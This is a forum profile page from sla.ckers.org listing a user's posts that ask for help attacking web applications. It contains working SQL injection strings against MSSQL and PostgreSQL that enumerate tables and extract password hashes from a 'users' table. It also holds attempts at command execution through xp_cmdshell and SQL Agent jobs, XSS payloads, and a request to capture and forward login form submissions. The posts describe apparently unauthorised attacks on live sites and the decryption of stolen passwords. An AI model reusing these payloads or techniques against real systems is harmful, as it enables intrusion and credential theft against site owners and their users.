Sla.ckers.org
This group should mostly be dealing with how web applications enable networking security issues that are otherwise not there. Everything is being tunneled over port 80 now so what does that enable and how do we fix it? 

Results 1 - 19 of 19
6 years ago
clooless
Just looking for a way of logging typical form POST requests such as:- <form name="logonForm" method="post" onsubmit="return OnSignOn(this)" action="https://.../authenticate.do"> Preferably without using PHP, but JavaScript/Ajax. All same-domain stuff, just logging to a file, and hopefully forwarding the requests on. Thanks.
Forum: Networking
6 years ago
clooless
Figured it out finally; turns out it's based on the Vigenère polyalphabetic cipher, only all printable ASCII characters are used instead of just the alphabet. By reverse-mapping the known password you find the keyword, and once you've got that you can decrypt the rest. Must be an in-house SP....
Forum: SQL and Code Injection
6 years ago
clooless
Yep, tried them but no good. I have a known password which I compared to the encrypted version, and it looks like some kind of XOR bit shifting. This is because in the unencrypted password there are 2 c's, which once encrypted become v7, and 2 2's which become $K, i.e. cc22 > v7K$. Ah well, it's a challenge.
Forum: SQL and Code Injection
6 years ago
clooless
While enumerating table info from an MSSQL 2000 DB, data can be retrieved cleanly such as username, email etc., but I've found that the data in the password column seems to be encrypted in some way. Here are some examples:- d^1+5r_'CT Ea1'K! l[2!BpSz Just wondered if anyone has seen this type of encryption before, perhaps some kind of XOR.
Forum: SQL and Code Injection
6 years ago
clooless
Well, I got a stage further with this:- %20and%201%20in%20(+select+TOP+1+name+from+(SELECT%20top%202%20name%20FROM%20mydb..syscolumns%20WHERE%20id%20=%20(SELECT%20id%20FROM%20mydb..sysobjects%20WHERE%20name%20=%20'users')+order+by+1+DESC+)+ctable+order+by+1+ASC)-- which brings up this error:- Syntax error converting the nvarchar value 'username' to a column of data type int. But incrementi
Forum: SQL and Code Injection
6 years ago
clooless
I'm using:- and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') -- to successfully enumerate user defined tables. Then I use:- SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'users') to get the first column name of the 'users' table. The problem I'm having is that when I try to enumerate columns like this:- group by users.username
Forum: SQL and Code Injection
6 years ago
clooless
For some reason they decided to use SHA2 to encrypt. I figured it out anyway: if cast does not have an implied length, it defaults to 30 characters. So the inject goes like this:- default.asp?id=666+AND+(select+cast(CHAR(+127+)%2b+rtrim(cast((select+ISNULL(cast(pword+as+varchar(64))%2c'null')+from+(select+top+1+*++from+(select+TOP+9+*+from+mydb..users+order+by+1+desc+)+dtable+order+by+1+asc)+fin
Forum: SQL and Code Injection
6 years ago
clooless
The following injection gives me the first 30 characters of a hash that I know is 64 characters long. Just wondering if anyone knows how to alter this injection to get all 64 characters... default.asp?id=666+AND+(select+cast(CHAR(+127+)%2b+rtrim(cast((select+ISNULL(cast(pword+as+varchar)%2c'null')+from+(select+top+1+*++from+(select+TOP+9+*+from+mydb..users+order+by+1+desc+)+dtable+order+by+1+as
Forum: SQL and Code Injection
6 years ago
clooless
Just wondering if it is possible to embed an image into a document element if the page is vulnerable to XSS in the form of:- <xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml> As redirection is possible using the following method:- <xml id="X"><a><b><script>document.vulnerab
Forum: XSS Info
7 years ago
clooless
Having found a vulnerable table and extracted usernames and passwords successfully from a PostgreSQL database using injection, I would like to know if there is any more that can be achieved. The DB has no publicly accessible access, so all I can hope for is some way to perform system commands or upload a file. Has anyone done anything in this area?
Forum: SQL and Code Injection
7 years ago
clooless
I would expect it to come back with "Unclosed quotation mark after the character string ' or 1=1-- " and not ' AND Status=1'. Obviously the quotes are open & I tried various ways of closing them; that's why I'm posting here.
Forum: SQL and Code Injection
7 years ago
clooless
Hi there. Just trying various injections against MSSQL on ASP, I keep getting the following error message based on ' or 1=1-- : Unclosed quotation mark after the character string ' AND Status=1'. Not sure why it comes back with that after injecting ' or 1=1--. Anyone have any tips on this? Thanks.
Forum: SQL and Code Injection
7 years ago
clooless
I can get a working XSS with the following:- %3B%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%0A%0A ;//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> Just need some help replacing the alert with an image. I've tried a few things using String.fromCharCode to decimal
Forum: XSS Info
7 years ago
clooless
By using =convert(varchar%2C0x7b5d)%2B%40%40version I can successfully get the SQL version back in an error message. I would like to use this method to display all the available databases. I'm just not sure how the last statement decodes, as to me it looks like ,{]+@@version How does this work?
Forum: SQL and Code Injection
7 years ago
clooless
I was fuzzing through a website when I got this overflow condition when trying an SQL injection ?NewsID=031003000270000 Microsoft.VisualBasic.CompilerServices.IntegerType.FromString(String Value) +110 Microsoft.VisualBasic.CompilerServices.IntegerType.FromObject(Object Value) +750 ????.Convert.ToInt(Object v, Int32 iDefault) ****.Controls.NewsDetail.get_NewsID() ****.Con
Forum: SQL and Code Injection
7 years ago
clooless
Just as a closing note, is there anything interesting you can do with the EXEC command? I guess you could create some TSQL functions or add users... or this one was good in its day:- but to get it in one line? USE msdb EXEC sp_add_job @job_name = 'testjob1', @enabled = , @description = 'testjob1', @delete_level = 1 EXEC sp_add_jobstep @job_name = 'testjob1', @step_name = ' Exec my sql
Forum: SQL and Code Injection
7 years ago
clooless
Yes, it'd be great if xp_cmdshell worked, but it just delays for a few minutes then errors out... anyway, still getting those strange responses:- 1 UNION SELECT username, password FROM USERS Invalid object name 'USERS216'. Once I figure out what this '216' is, things should be O.K.
Forum: SQL and Code Injection
7 years ago
clooless
I agree with your logic, but none of the query syntax changes made any difference. Makes me think that there is partial input sanitising; I just have to figure out a way around it, perhaps with character substitution. Being tricky with this balanced query gave me the name of the first column of the SysObjects table:- =union%20select%20name,1,1,1,1,1,1,1,1,1%20from%20SysObjects%20where%20schema
Forum: SQL and Code Injection
7 years ago
clooless
For a few hours after finding an injection point I'm getting some strange responses from SQL. One example is this query =-1'UNION%20SELECT%20@@version which comes back with:- Unclosed quotation mark before the character string 'UNION SELECT @@version21'. What I don't get is why it's tacked 21 on the end. I tried a few different ways but I always seem to get 21 or 216 tacked on the end of the rep
Forum: SQL and Code Injection